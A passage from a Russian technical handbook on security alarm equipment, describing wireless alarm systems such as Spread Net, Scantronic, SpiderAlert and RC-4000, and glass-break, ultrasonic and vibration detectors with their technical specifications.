Прибор имеет автоматически подзаряжаемый аккумулятор, который обеспечивает автономную работу в течение 12 час. В комплект поставки входит блок выносных светодиодных индикаторов состояния каждого шлейфа. Возможно подключение внешней сирены и сигнальной лампы.
В конструкции прибора учтен многолетний опыт специалистов вневедомственной охраны, поэтому функции прибора легко адаптируются к условиям конкретного объекта.
Прибор имеет габаритные размеры 300х246х82 мм и сохраняет работоспособность при температуре -30...+ 50°С.
2. 4. Беспроводные системы безопасности и сигнализации
Беспроводные радиосистемы безопасности и сигнализации позволяют организовать многоканальные системы ограничения доступа, управления и слежения за разнообразными объектами. Эти системы широко используются для охраны периметров и отдельно стоящих удаленных объектов. Применение современных технологий и методов обработки сигналов делает беспроводные системы конкурентноспособными по сравнению с обычными проводными системами, а иногда и единственно возможным вариантом организации охраны.
2. 4. 1. Беспроводная система сигнализации Spread Net
Система Spread Net производства компании С&К Systems относится к системам высокой помехозащищенности. В ней использована технология распределения спектра, применяемая Национальным управлением по аэронавтике США (НАСА). В системе осуществляется передача информации шумоподобным сигналом, состоящим из 126 элементов. Особенности системы:
> простота установки;
> применение специальных антенн для улучшения приема сигналов;
> возможность использования до 16 зон охраны;
> индикация сигнала тревоги и неисправности для каждой зоны;
> автоматическое включение самоконтроля;
> автоматический контроль радиоканала для выбора рабочей частоты;
> автоматический контроль радиоканала на предмет совместимости с дру гой системой этого типа;
> устойчивость к шумам и радиопомехам. Основные технические характеристики системы Spread Net: Рабочий диапазон частот, МГц .................................................. 902—928
Дальность действия в зоне прямой видимости, м ............................... 2000
Мощность радиоизлучателя, мВт....................................................... 100
Контроль работоспособности с интервалом, мин ......................... от 0 до 5
Диапазон рабочих температур, С ............................................от 0 до 60
Питание датчиков:
количество батарей, шт ................................................................... 2
тип батарей ........................................................................литиевые
напряжение, В.............................................................................3,6
В состав системы Spread Net входит следующее оборудование (рис. 2.85):
передатчик SN900-PROG, приемник SN912-RCV, интерфейс SN913-I/0 (для
сопряжения с контрольными панелями), дверной контакт SN930-DOOR (он же универсальный передатчик), пассивный инфракрасный детектор SN940-PIR, детектор битого стекла SN950-GLASS, кнопки подачи сигнала тревоги SN970-PANIC, SN971-HOLDUP и SN960-PENDANT, комбинированный детектор SN935-DT, детектор контрольной банкноты SN973-MONEY, дымовой пожарный детектор SN980-SMOKE и тепловой извещатель SN981-HEAT.
Ориентировочная стоимость минимальной конфигурации системы на 16 зон охраны составляет 900 USD.
Рассматриваемую систему SpreadNet можно без преувеличения отнести к устройствам, уникальным для гражданского применения. До настоящего времени системы такого класса использовались только для военных целей, специальной и космической связи. Многолетние разработки С&К System, Inc. позволили реализовать беспроводную систему охранной сигнализации, имеющую превосходные параметры и возможности при вполне приемлемых ценах.
В чем же заключается уникальность этой системы? Прежде всего, в сигнале, используемом для передачи информации. Это так называемый шумоподобный сигнал, состоящий из 126 элементов, со спектром, распределенным в широкой полосе частот. Со спектральной точки зрения, такой сигнал выглядит, как шум. Поэтому крайне сложно не только зафиксировать его параметры, используя соответствующую аппаратуру, но даже обнаружить факт работы системы. При ширине рабочей полосы частот 2, 4 МГц и выходной мощности передатчиков 100 мВт средняя мощность на полосу частот 10 кГц (как в обычной узкополосной системе) составляет 0, 417 мВт. Длительность информационного сигнала равна 7, 6 мс.
Важнейшим требованием к любой системе охранной сигнализации является контроль канала связи. Требование контроля канала во много раз важнее и сложнее реализуется в системах, использующих радиоканал. Это обусловлено тем, что реально в радиосистемах постоянный контроль канала связи неосуществим, так как для этого требуется отдельный частотный канал для каждого передатчика. При разумных требованиях к таким системам контроль канала обычно осуществляется с той или иной периодичностью. Система SpreadNet позволяет осуществить передачу тестовых сигналов контроля передатчиков с интервалом от 30 с до 5 мин.
Структура используемого сигнала обеспечивает также высокую помехоустойчивость системы. Для подавления сигнала необходимо создать помеху в широкой полосе частот (более половины ширины спектра), что достаточно сложно реализовать технически. Но даже при постановке такой помехи система зафиксирует тревогу, поскольку для блокирования Spread Net необходимо решить противоречивую задачу: с одной стороны, подавить сигнал тревоги, а с другой — сохранить сигнал контроля передатчиков в той же полосе частот и с теми же параметрами, что практически нереально.
Информативность сообщений от элементов системы (передатчиков) также весьма важный показатель. Система SpreadNet дает возможность регистрировать тревогу, вскрытие извещателей, разряд батарей, отсутствие сигнала контроля и нарушение линии связи приемник-интерфейс (контрольная панель).
Если при установке проводных систем охранно-пожарной сигнализации не возникает проблем с взаимным влиянием одной системы на другую, то в беспроводных системах взаимные помехи могут стать причиной сбоев в работе. Система SpreadNet позволяет осуществить автоматический контроль эфира на наличие других радиосистем, создающих взаимные помехи, и соответствующим образом изменить параметры функционирования системы. Также производится автоматический выбор параметров сигнала, обеспечивающих максимальное отношение сигнал/шум в месте конкретной установки.
Одна из чрезвычайно полезных особенностей системы SpreadNet — способность измерить реальное отношение сигнал/шум для каждого передатчика объективно, в цифрах, в децибелах. Это позволяет, во-первых, снять точную карту распределения качества приема сигнала из различных частей объекта и, во-вторых, выбрать оптимальное место расположения каждого извещателя с точки зрения максимума отношения сигнал/шум, перемещая его на некоторое расстояние и измеряя при этом соотношение уровней сигнала и шума. Ресурс источников питания беспроводных систем, определяющих продолжительность функционирования передатчиков до замены источников питания, зависит от многих условий. В системе SpreadNet продолжительность использования источников питания достаточно велика благодаря ряду параметров и конструктивных особенностей устройств. Например, используемый диапазон частот 900 МГц позволяет реализовать оптимальные четвертьволновые антенны внутри корпуса извещателей без увеличения их размера. Это, а также малая длительность передаваемого сигнала, позволяют уменьшить потребление энергии и увеличить срок службы источников питания в зависимости от режима работы до 5 лет.
2. 4. 2. Радиосистемы безопасности фирмы Scantronic
Фирма Scantronic предлагает широкий спектр приемников и передатчиков, из которых легко собрать необходимое оборудование для конкретного применения. Все изделия изготовлены с использованием современной полупроводниковой и микропроцессорной технологий в условиях строгого контроля за сборкой и качеством, чем обеспечивается их высокая надежность.
Все радиосистемы работают на частоте профессиональных служб безопасности 173, 22511 МГц в узкой полосе частот. Радиосистемы Scantronic — это семейство частотно-модулированных передатчиков и гетеродинных приемников с двойным преобразованием частоты, для которых характерным является применение модулей памяти и батарей с большим сроком службы. Эти высокоселективные радиосистемы, игнорирующие любые нежелательные сигналы, способны более надежно декодировать принимаемые сообщения, чем другие системы. Все элементы радиосистем имеют современный дизайн (рис. 2. 86)
В качестве примера кратко рассмотрим особенности систем безопасности Scantronic серии 4600.
Рис.2.86 Система безопасности Scantronic
Системы серии 4600
Особенности систем:
> 8-зоновая панель управления со звонком;
> все зоны с программным управлением;
> дополнительная возможность программирования зон по радиоканалу;
> запоминание состояния тревоги по зонам;
> защищенность клавиатуры от несанкционированного использования;
> батареи емкостью 2, 1 Ахч обеспечивают непрерывную работу системы в течение 15 часов;
> уникальная программа обнаружения ошибок (или неисправностей);
> имеют полный набор охранных датчиков.
Системы включают в свой состав полный набор передатчиков и приемников для любых применений, 5 типов передатчиков «Тревожная кнопка», включая «наклонный» блок переключения, двухканальный приемник, совместимый со всеми панелями управления, восьмиканальный приемник (с возможностью расширения до 64 каналов), питаемый от магистрали или от источника+ 12 В, программируемый многофункциональный передатчик 4603. С помощью стандартного передатчика КТ4602 или подвесного блока 4601 аппаратура систем позволяет контролировать площадь в радиусе до 900 м.
Система Multiscan 4660
Особенности системы:
> изготовлена по современной технологии;
> передатчик на 512 дуплексных каналов;
> широкий спектр применения (вызов обслуживающего персонала, безопасность персонала или диспетчерское управление);
> совместима с другими моделями серии 4600;
> сообщения выдаются на одном из семи языков;
> 2 типа блоков дистанционного дисплея;
> 32-х символьный ЖК дисплей, используемый в качестве дистанционного.
Имеется возможность подключения с помощью обычной трехпроводной шины до 7 дистанционных дисплеев. Система совместима с большинством систем пейджинга, имеет выход на принтер и интерфейс RS-232. Multiscan 4660 совместима с моделями 4600 и Viper.
Широкий спектр радиоборудования позволяет реализовать практически любую конфигурацию системы для конкретного применения, например: защита удаленного пользователя, работающего без помощника или оставшегося без него (детектор наклона определит падение человека на землю, а радиопередатчик сообщит об этом в центр управления); управление на производстве (системы управления механизмами); коммерческая безопасность (радиосистема способна защитить каждую картину в музее); использование в больнице (для вызова персонала).
Разновидности моделей передатчиков, приемников и антенн радиосистем безопасности фирмы Scantronic приведены в табл. 2. 6.
Таблица 2. 6. Разновидности радиосистем фирмы Scantronic
Наименование изделия |
Назначение |
Передатчики |
|
4601-50 |
Подвесной передатчик |
4601-55 |
Подвесной передатчик с короткой антенной |
4602-55 |
Переносной передатчик, работающий на большом расстоянии |
4604-60 |
Универсальный передатчик с программным управлением |
4603-55 |
Контактный передатчик с постоянным магнитом |
4605-55 |
Триггер/Т для панели 4600, двухканальный передатчик |
4606-55 |
Аналог 4602 с «наклонным» переключателем и звуковым сигналом |
4608 |
Пассивный И передатчик непрерывного действия |
4609 |
Четырехканальный передатчик, работающий на большом расстоянии с питанием+ 12 В |
Приемники |
|
4600 |
8-зоновая панель управления |
4612 |
Двухканальный приемник |
4613 |
Переключатель напряжения 240 В мощностью 1, 5 кВт |
4618-50 |
8-канальный блок с программным управлением |
4618-55 |
Встроенная плата реле для модели 4618-50/60 |
Окончание таблицы 2. 6
Наименование изделия |
Назначение |
Приемники |
|
4618-60 |
Модель 4618-50 на 240 В |
4619-50 |
8-канальный расширительный блок для модели 4618-50/60 |
4660 |
Мультисканирующий 512-зоновыйриемник |
4670-00 |
Передатчик вызова обслуживающего персонала |
4670-01 |
Передатчик вызова обслуживающего персонала |
4670-02 |
Передатчик вызова обслуживающего персонала |
4661 |
Аналог модели 4660 |
4662 |
Терминал оператора для модели 4660 |
Антенны |
|
4594 |
Четвертьволновая штыревая антенна BNS |
4595 |
4-х элементная направленная антенна YAGI |
4597 |
Полуволновый диполь |
4598 |
Четвертьволновая спиральная антенна |
4599 |
Четвертьволновая спиральная антенна |
2.4.3. Системы централизованного контроля фирмы Visonic, Ltd.
Система SpiderAlert
Система SpiderAlert фирмы Visonic, Ltd. (Израиль) по своим функциональным возможностям занимает промежуточное положение между контрольными панелями и мощными системами централизованного контроля. Ядром системы является центральный блок управления, который по стандартному последовательному интерфейсу RS-232 связан с персональным компьютером. Центральный блок принимает информацию от многочисленных (до 255) адресных приемников по двухпроводной шине данных. В качестве приемников используются радиоприемники сигналов от микромощных радиопередатчиков, приемники инфракрасных сигналов и приемники контактных событий. Источники информации в системе — различные детекторы или кнопки тревоги. Они имеют свой персональный код от 1 до 4087,
Особенности системы:
> свободное конфигурирование системы под конкретный объект с учетом постановки на охрану и снятия с охраны отдельных частей объекта как с центрального пункта, так и со стороны «хозяев» подразделений. А также постановка/снятие охраны владельцем объекта, а с центрального пункта — только постановка;
> произвольное назначение количества охраняемых зон, их функций и статуса;
> переключение системы в различные режимы работы (дневной, ночной, охраны периметра);
> отображение событий на графическом плане охраняемого объекта с использованием узнаваемых графических образов источников (типов датчиков) и приемников тревожной информации;
> переназначение функций выбранных передатчиков-брелков с функции «Тревога» на функцию «Я жив»;
> реализация функции автоматического контроля за работой сторожа, с фиксацией его реальной траектории движения по объекту;
> ведение журнала событий и журнала постановки/снятия охраны объектов;
> управление внешними устройствами (системами пожаротушения, оповещения, блокировки/разблокировки) через блок, содержащий 8 мощных электромагнитных реле.
В состав системы Spider входят около двух десятков различных приборов, начиная от источника электропитания и заканчивая разнообразными датчиками событий. Общая длина шины данных системы может достигать 3—5 километров. Для увеличения эффективной длины шины используется стандартный элемент системы — ретранслятор шины.
При первоначальном включении системы каждый приемник информации посылает в центральный блок системы сообщение о своем наличии в системе. Это приводит к его регистрации в центральном блоке. В дальнейшем, с периодом 90 с, каждый приемник подтверждает свое присутствие в системе. При отсутствии подряд двух таких подтверждений центральный блок формирует тревожное сообщение об исчезновении зарегистрированного приемника. Соответствующее сообщение появится и при коротком замыкании шины данных. Это позволяет контролировать возможные злонамеренные действия по нарушению работы системы.
В процессе работы системы каждое сообщение, полученное от источника информации, фиксируется в соответствующем приемнике. После этого приемник передает полученное сообщение на центральный блок системы. В сообщении указывается как номер приемника информации (адрес), так и идентификационный номер источника сообщения. Центральный блок системы подтверждает получение сообщения, отправляя в приемник специальную кодовую посылку. Если ответ от центрального блока не получен, приемник периодически повторяет попытку передачи сообщения о тревоге до получения подтверждения.
Двойное кодирование источников и приемников тревожной информации, а также эффективное сочетание проводного и беспроводного способов передачи информации позволяет реализовать целый ряд новых функций. Так, при появлении сигнала от кнопки тревоги по ее индивидуальному коду можно оперативно выявить имя владельца, а по адресу приемника, принявшего сигнал, можно с точностью до нескольких метров определить местонахождение потерпевшего. Общее число кодируемых источников тревожной информации в системе SpiderAlert превышает 4000 единиц. Такие потенциальные ресурсы системы позволяют строить на ее основе системы контроля для крупных зданий, офисов и организаций с возможностью свободной настройки под конкретную задачу:
будь то охрана многоэтажного дома или протяженной торговой площадки с общим числом охраняемых объектов более 300. В то же время низкая стоимость ее элементов дает возможность применять ее для задач охранной сигнализации коттеджей, группы квартир или небольших предприятий.
Система может быть реализована (рис. 2. 87) как в чисто проводном варианте, так и с использованием радиоканальных (рис. 2. 88) компонентов (кнопок тревоги, детекторов). Применение радиодетекторов и универсальных радиопередатчиков существенно снижает затраты на монтаж системы. Расстояние от передатчика до ближайшего приемника составляет 30—100 м, а при использовании простых направленных антенн может быть увеличено до 1—2 км.
Центральный блок управления способен работать автономно, без подключения к компьютеру. При возникновении события в системе на миниатюрный индикатор блока управления на несколько секунд выводится сообщение о но-
Рис. 2. 87. Структура системы SpiderAlert
Рис. 2. 88. Радиооборудование фирмы Visonic Ltd.
мере приемника тревожного события и код источника события. Одновременно с этим имеется возможность оповещать службу охраны посредством управления аудиовизуальными устройствами, подключенными к блоку. Однако в полной мере функциональные возможности системы раскрываются при эффективной поддержке со стороны программного обеспечения персонального компьютера.
Открытый для пользователя протокол обмена между компьютером и центральным блоком системы дает возможность создания заказных или индивидуальных систем мониторинга с предельно адаптированным под конкретную задачу интерфейсом «пользователь-система». Непрерывное протоколирование всех событий в системе дает возможность проследить характер развития происшествия. Срабатывание всех компонентов системы точно привязано ко времени и фиксируется в памяти компьютера в виде специального журнала событий. Систему мониторинга SpiderAlert можно рассматривать и как универсальную, контрольную панель с адресными датчиками, которая с помощью модулей сопряжения способна эффективно взаимодействовать с любым традиционным охранным оборудованием. Функциональные возможности и свойства системы определяются как аппаратурой, так и программным обеспечением.
Система реализована на IBM PC-совместимом компьютере (i80286 и выше, видеоадаптер стандарта EGA или VGA, ОЗУ емкостью 1 Мбайт, жесткий диск объемом 80 Мбайт и более, порты СОМ1, COM2) в среде DOS и предусматривает взаимодействие с операторами нескольких уровней подготовленности и доступа. Один уровень, «охранника», требует минимальной подготовки и подразумевает использование мыши и нескольких клавиш клавиатуры компьютера. Другой уровень — «хозяина», обеспечивает санкционированный доступ к журналам системы и к смене режимов работы системы. Третий уровень — «настройщика», дает возможность конфигурирования системы со свободным включением и отключением любого элемента системы и назначения его статуса.
Система RC-4000
Многофункциональные системы фирмы Visonic, Ltd., обладая развитыми средствами радио- и телефонной связи, способны собирать и обрабатывать самую различную информацию, связанную с безопасностью: по охране объектов, пожарной безопасности, контролю за чрезвычайными ситуациями, оперативному вызову врачей на объекты, лишенные иных средств связи. В ряде регионов России охранные структуры остановили свой выбор на системе централизованного контроля RC-4000 (рис. 2. 89).
Все компоненты этой системы: детекторы, контрольные панели, средства радио- и телефонной связи, а также Центральная станция прошли сертификацию в органах МВД и Минсвязи России. Система централизованного контроля RC-4000 — это разветвленная структура с центральным пультом наблюдения, с набором технических средств для передачи информации от удаленного охраняемого объекта и комплексом устройств обнаружения тревожных извещений на самом объекте. Аппаратура центрального пульта обеспечивает непрерывный текущий контроль изменений состояния объекта, оперативное оповещение охранного персонала о месте и характере тревоги, автоматическое ведение протокола событий в системе.
Система централизованного контроля RC-4000 выгодно отличается от аналогичных устройств других фирм умеренной ценой и развитым абонентским оборудованием. Информация от охраняемых объектов может поступать на центральную станцию по телефонным линиям и радиоканалу. Минимальная кон-
Рис. 2. 89. Система централизованного контроля RC-4000
фигурация возможна при использовании только одного телефонного канала связи с аппаратурой охраняемого объекта. Максимальное количество телефонных линий, с которыми способна работать станция, — 6. При использовании радиоканала в состав оборудования дополнительно включаются радиоприемник и контроллер радиоканала. Возможно использование станции исключительно в радиоварианте. Максимальная конфигурация станции — 6 телефонных и один радиоканал. При максимальном количестве каналов связи станция способна эффективно взаимодействовать с тысячами абонентов.
Мощное русифицированное программное обеспечение позволяет реализовать самые разнообразные функции контроля, протоколирования, фильтрации и интерпретации событий. На экран компьютера выводятся сообщения на русском языке типа «Взлом» или «Нападение» с последующим выводом адреса и имени абонента, а также перечня действий оператора, рекомендованных в качестве целесообразных при этой тревоге и именно у этого абонента.
Протокол связи станции RC-4000 с персональным компьютером является открытым для пользователя. Это означает, что несложный способ кодирования сообщений, которыми обмениваются станция и компьютер, не засекречен, а напротив, четко описан в руководстве пользователя станции. Это дает возможность создавать свои версии программного обеспечения, способные отражать такие потребности и такую специфику объектов, которые часто невозможно предугадать в универсальной программе.
Удаленность абонента от радиоприемной антенны Центральной станции может составлять 15—25 км. При возникновении проблем с передачей по радиоканалу в местности со сложным рельефом возможно использование специальных ретрансляторов типа REP-130. Такой ретранслятор содержит модули радиоприемника и радиопередатчика и специальный контроллер управления процессом ретрансляции.
Важным свойством системы на базе RC-4000 является ее развиваемость. Система может работать, когда имеется Центральная станция и хотя бы один абонентский коммуникатор. Программное обеспечение Центральной станции позволяет по мере развития системы добавлять новых абонентов, причем у каждого из них может быть установлена любая комбинация объектового оборудования.
ГЛАВА 3. ДАТЧИКИ И ДЕТЕКТОРЫ ОХРАННЫХ СИСТЕМ.
Уровень надежности любой охранной системы или комплекса и их работа в целом зависят от того, какие датчики и детекторы в них использованы, где они размещены на охраняемой территории.
Как уже отмечалось (см. раздел 1.2.2), под датчиками будем понимать извещатели, преобразующие физические величины и характеристики (например, тепло, свет, звук и т.п.) в электрический сигнал. Детекторами же будем называть извещатели, включающие в свой состав датчики, схему обработки сигналов и схему принятия решения.
Существуют различные типы датчиков. Издавна известны электроконтактные датчики, работающие на размыкание или замыкание контактов, датчики, выполненные из тонкого провода или фольги, рвущихся при механическом воздействии на них.
В современных системах охраны все большее предпочтение отдается бесконтактным датчикам и детекторам. К ним относятся пассивные и активные детекторы движения на ИК лучах, радиоволновые детекторы, детекторы вибрации и битого стекла, ультразвуковые, магнитоконтактные и фотоэлектрические датчики. Современные датчики и детекторы выполняются на основе последних достижений науки и техники. Они имеют не только высокие технические характеристики, но и прекрасный дизайн.
Детекторы движения позволяют регистрировать возникновение движения на охраняемом объекте. Существует несколько их разновидностей, различающихся по принципу регистрации движения: ультразвуковые детекторы, пассивные и активные детекторы с инфракрасным датчиком, детекторы с радиоволновым датчиком, а также их комбинации.
Ультразвуковые детекторы имеют довольно высокую чувствительность. Они излучают и принимают отраженный ультразвуковой сигнал и позволяют регистрировать даже незначительный воздушный поток. В связи с этим возникает проблема помехоустойчивости — любое незначительное движение, сквозняк приводят к срабатыванию датчика и ложной тревоге.
В настоящее время широко используются детекторы движения на основе ИК датчиков. Они срабатывают при попадании движущегося объекта, излучающего тепло (например, человека), в зону чувствительности датчика. ИК детекторы движения обеспечивают надежную охрану большой площади, имеют современный дизайн, который хорошо вписывается в интерьер квартиры или офиса.
В данной главе рассмотрены наиболее популярные и надежные типы датчиков и детекторов, приведены их технические характеристики и особенности применения.
3.4. Детекторы битого стекла, ультразвуковые и вибродатчики
Кроме описанных выше детекторов, в охранных системах используются и другие типы датчиков. К ним относятся детекторы битого стекла, ультразвуковые датчики, вибродатчики и т. п.
Задача обнаружения разрушения стекла может решаться с использованием различных физических принципов. К основным из них можно отнести следующие:
1. Регистрация механических нарушений элементов извещателя. В этом случае используются электроконтактные датчики из фольги или проводник из специального армированного стекла. Механическое разрушение целостности проводника при разрушении стекла фиксируется схемой обработки.
2. Использование инерционных свойств. В этом случае извещатель имеет два элемента: один жестко закрепляется на поверхности стекла, другой — подвижный. При механических колебаниях стекла контакт между этими элементами нарушается, что и фиксируется схемой обработки.
3. Использование пьезоэлектрического эффекта. В этом случае извещатели могут быть как пассивными, так и активными. В пассивном варианте пьезодатчик размещается на поверхности стекла. Он преобразует механические колебания стекла в электрический сигнал, который обрабатывается соответствующей схемой. Такие детекторы имеют низкую помехозащищенность и не позволяют контролировать работоспособность пьезодатчиков. Лучшие характеристики имеют активные извещатели, состоящие из передатчика и приемника акустических колебаний. Поскольку частота колебаний, излучаемых передатчиком, заранее известна, это позволяет в приемнике выделять именно ее, что повышает помехоустойчивость системы. Кроме того, любые нарушения контакта со стеклом передатчика или приемника будут зарегистрированы схемой обработки.
Всем детекторам, использующим рассмотренные выше принципы, свойственен общий недостаток — необходимость установки на поверхности защищаемого стекла чувствительных элементов. Особенно это становится важным для окон и дверей, имеющих большое количество элементов остекления. Каждый из этих элементов требует установки на нем отдельного извещателя.
4. Регистрация акустических (звуковых) колебаний, возникающих при разрушении стекла. Этот принцип реализован в большинстве современных детекторов битого стекла. Он обеспечивает такие важные преимущества, как отсутствие каких-либо элементов на охраняемой поверхности стекла и возможность контроля нескольких окон одним детектором.
Детекторы битого стекла реагируют на звук разбиваемого стекла. Наиболее совершенные модели анализируют спектр звуковых сигналов в помещении. Если этот спектр содержит составляющую, совпадающую со спектром разбиваемого стекла, то детектор срабатывает.
Двухпороговые детекторы битого стекла регистрируют звук удара по стеклу и звук разбиваемого стекла. Для индикации тревоги такой извещатель должен зарегистрировать два этих сигнала с интервалом между ними не более 150 мс.
Ультразвуковые датчики работают следующим образом. Они излучают и принимают отраженный сигнал ультразвуковой частоты. Эти датчики характеризуются высокой чувствительностью, высоким уровнем ложных срабатываний, зависимостью настроек от перепадов температуры и влажности и т. д. Поэтому ультразвуковые датчики не нашли широкого применения и используются, в основном, в недорогих системах для защиты замкнутых изолированных объемов.
Вибродатчики реагируют на наличие вибрации поверхности, контролируемой прибором, возникающей при попытке ее разрушения. Эти датчики работают на основе пьезоэффекта или эффекта электромагнитной индукции и устанавливаются на стенах, дверях, стеклах и т. п. Вибродатчики отличаются низкой стоимостью и низкой помехоустойчивостью.
3. 4. 1. Детекторы битого стекла серии FG-1000
Детекторы битого стекла фирмы С&К (IntelliSense) моделей FG-1015/1025/ 1025R/1025Z предназначены для бесконтактного обнаружения повреждений и разрушений остекленных конструкций. Приборы регистрируют звуки, сопровождающие удар о стекло и возникающие при его разбивании. Детекторы имеют современный дизайн (рис. 3. 35) и могут устанавливаться на стене, оконной раме или на потолке охраняемого помещения.
Рис. 3. 35. Детекторы битого стекла FG-1015 и FG-1025
Особенности детекторов FG-1015, FG-1025:
> высокая чувствительность и верность регистрации;
> цифровая обработка сигналов;
> режим тестирования;
> простой контроль работоспособности;
> устойчивость к ложным срабатываниям;
> регистрация сигналов, приходящих только от охраняемого стекла;
> простота в установке и подключении;
> устойчивость к воздействию радиопомех.
В последние годы весьма популярными стали бесконтактные акустические извещатели разбивания стекла. Однако в ряде случаев их использование ограничено, так как эти типы извещателей битого стекла реагируют как на звуки, создаваемые внутри помещения, так и на акустические колебания, приходящие от охраняемого стекла. Это относится к ситуации, когда в охраняемых помещениях могут возникать сильные шумы, приводящие к ложным срабатываниям, например в магазине, торгующем магнитофонами, телевизорами и другой аналогичной техникой. В таких случаях незаменимым становится акустический извещатель FG1025Z.
Это первый извещатель разбивания стекла, который регистрирует акустические колебания, приходящие только со стороны охраняемого стекла. В нем используется запатентованная технология обработки акустических колебаний Time-of-Arrival Zone Processing — обработка сигналов из контролируемой зоны по времени прихода, являющаяся серьезным шагом на пути к увеличению вероятности обнаружения и снижению риска ложного срабатывания.
Рис. 3. 36. Контролируемые зоны детекторов битого стекла FG-1015 и FG-1025
Технология Time-of-Arrival основана на использовании двух независимых микрофонов, что позволяет регистрировать только акустические колебания, приходящие из охраняемой области пространства, и игнорировать любые звуки, приходящие с другой стороны.
Акустические колебания принимаются двумя микрофонами, направленными в противоположные стороны под углом 180°, и обрабатываются различным образом в зависимости от того, какой из микрофонов раньше принял акустический сигнал. Сигнал, принятый микрофоном, направленным в сторону охраняемой области, идентифицируется схемой обработки — действительно ли он возник в результате разрушения стекла. При этом сигнал, принятый вторым микрофоном, игнорируется.
Окружающее пространство в зависимости от расположения микрофонов можно условно разделить на контролируемую и исключенную зоны (рис. 3. 36). Между этими зонами существует промежуточная зона (два сектора с угловыми размерами 20°), в которой вероятность регистрации полезных сигналов ниже 50%. Для регистрации событий с достаточной устойчивостью к ложным срабатываниям охраняемый объект не должен находиться в этой области.
Новая технология позволила значительно повысить вероятность регистрации разрушения стекла, надежность извещателя и его устойчивость к ложным срабатываниям,
Светодиодные индикаторы, установленные на корпусе датчиков, отображают наличие приема акустических сигналов и режим тревоги. Для включения выключения светодиодной индикации и памяти тревог используются перемычки (FG-1015) или внутренние переключатели (FG-1025).
В соответствии с мировыми стандартами, извещатель FG-1025Z также содержит ряд дополнительных сервисных функций: дистанционное управление светодиодной индикацией, выход предупреждения о неисправности и командный вход. Вход управления светодиодом позволяет дистанционно включать/выключать режим светодиодной индикации. Выход предупреждения о неисправности предназначен для передачи сообщения на контрольную панель о возникновении нарушений в нормальной работе извещателя. Командный вход позволяет непосредственно или дистанционно включать режим автоматической проверки работоспособности различных элементов извещателя.
Встроенная система самодиагностики позволяет непрерывно автоматически производить проверку работоспособности прибора. При обнаружении неисправности выдается сигнал оповещения попеременным миганием светодиодов. Датчики имеют корпус из ударопрочной пластмассы белого цвета со встроенным датчиком вмешательства, реагирующим на снятие прибора со стены или открывание корпуса. Основные технические характеристики приборов:
Устойчивость к радиопомехам в
диапазоне 10-1000 МГц, В/м........................................................... 30
Устойчивость к электрическим разрядам, кВ........................................ 10
Дальность действия не более, м
FG-1015...................................................................................... 4, 6
FG-1025...................................................................................... 7, 6
Длительность запоминания тревоги, с............................ 5 (или до сброса)
Выходные реле:
реле вмешательства, мА/ В...................................................... 25/ 24
реле тревоги, мА/В.............................................................. 125/25
Напряжение питания, В................................................................ 8—14
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 25
Диапазон рабочих температур, °С.......................................... от 0 до+ 49
Габаритные размеры, мм:
FG-1015.......................................................................... 98х61х21, 8
FG-1025.......................................................................... 98х61х21, 8
FG-1025 R/ Z..................................................................... 108х21, 8
Масса, кг:
FG-1015.................................................................................. 0, 077
FG-1025.................................................................................... 0, 09
FG-1025R/Z........................................................................... 0, 125
Детекторы могут быть протестированы дистанционно при помощи имитатора разрушения стекла Flex Guard, например, модели FG-701 (рис. 3. 37). Имитатор воспроизводит звук разбивающегося стекла и может быть использован для тестирования всех извещателей битого стекла фирмы С&К.
Минимальный размер охраняемого стекла — 0, 28х0, 28 м. Стекло должно быть стационарно установлено в раме, встроенной в стену помещения или в перегородке шириной не менее 90 см. Требования, предъявляемые к охраняемому стеклу, приведены в табл. 3. 5.
Таблица 3. 5. Требования к охраняемому стеклу
Тип стекла |
Минимальная толщина, мм |
Максимальная толщина, мм |
Листовое |
2, 4 |
6, 4 |
Закаленное |
3, 2 |
6, 4 |
Многослойное* |
3, 2 |
14, 3 |
Армированное |
6, 4 |
6, 4 |
Покрытое пленкой** |
3, 2 |
6, 4 |
Герметизированное* |
3, 2 |
6, 4 |
Примечание:* — регистрируется при разрушении обоих слоев стекла;
** — дальность действия должна быть уменьшена до 4, 6 м.
3. 4. 2. Детектор акустический «Витрина»
Акустический детектор «Витрина» предназначен для охраны закрытых помещений. Прибор используется для бесконтактного обнаружения разрушения стеклянных конструкций (окон, витрин, дверей и т. д.). Особенности детектора «Витрина»:
> два способа работы: при питании от отдельного источника (+ 12 В) тревожное извещение формируется путем размыкания контактов выходных реле;
при питании по шлейфу ПКП («Аккорд», «Сигнал-ВК», «Рубин-6») или систем «Фобос», «Нева» тревожное извещение формируется путем изменения тока обтекания шлейфа;
> двухканальная обработка акустического сигнала разбивания стекла по 5 признакам с использованием микропроцессора;
> регулировка чувствительности. Основные технические характеристики:
Дальность действия, м........................................................................ 6
Потребляемый ток, мА........................................................................ 1
Диапазон рабочих температур,С...................................... от -10 до+ 50
Габаритные размеры, мм.......................................................... 90х60х45
3.4.3. Объемный ультразвуковой детектор «Эхо-А»
Охранный объемный ультразвуковой детектор «Эхо-А» выпускается по лицензии фирмы Aritech по заказу ГУ ВО МВД РФ. Он предназначен для охраны закрытых помещений и обеспечивает блокировку локальных зон объемов помещений, мест сосредоточения ценностей, оргтехники и т. п. с выдачей тревожного извещения путем размыкания контактов выходного реле.
Регулировка чувствительности позволяет плавно изменять размеры охраняемой зоны от 6 до 70 м2 (рис. 3. 38).
Рис. 3. 38. Схема зоны обнаружения извещателя «Эхо-А»
При установке детектора на потолке можно осуществлять охрану отдельных объектов (экспонаты, оргтехника, прилавки, стены и т. п.), расположенных внутри больших помещений (торговые, выставочные, музейные залы и т. п.).
Основные технические характеристики детектора:
Площадь зоны обнаружения не менее, м2 ............................................. 70
Напряжение питания, В............................................................ 10, 6— 15
Потребляемый ток не более, мА.......................................................... 30
Диапазон рабочих температур, С.......................................... от 0 до+ 50
Габаритные размеры, мм........................................................ 227х63х45
Масса, кг....................................................................................... 0, 25
3.4.4. Детектор вибрационный «Шорох-1»
Детектор вибрационный "Шорох-1" предназначен для обнаружения преднамеренного разрушения строительных конструкций в виде бетонных стен и перекрытий, кирпичных стен, деревянных конструкций, типовых металлических сейфов и шкафов. Прибор выполнен в отдельном корпусе (рис. 3. 39).
Рис. 3. 39. Детектор "Шорох-1" . 3.40. Способы применения детектора «Шорох-1»
Питание детектора осуществляется по шлейфу охранной сигнализации. Прибор может использоваться совместно с различными охранными системами. Тревожное извещение формируется путем изменения тока обтекания шлейфа. Основные технические характеристики:
Напряжение питания по шлейфу, В............................................. 10—30
Диапазон рабочих температур, С...................................... от -10 до +50
Относительная влажность окружающего воздуха не более, %................. 90
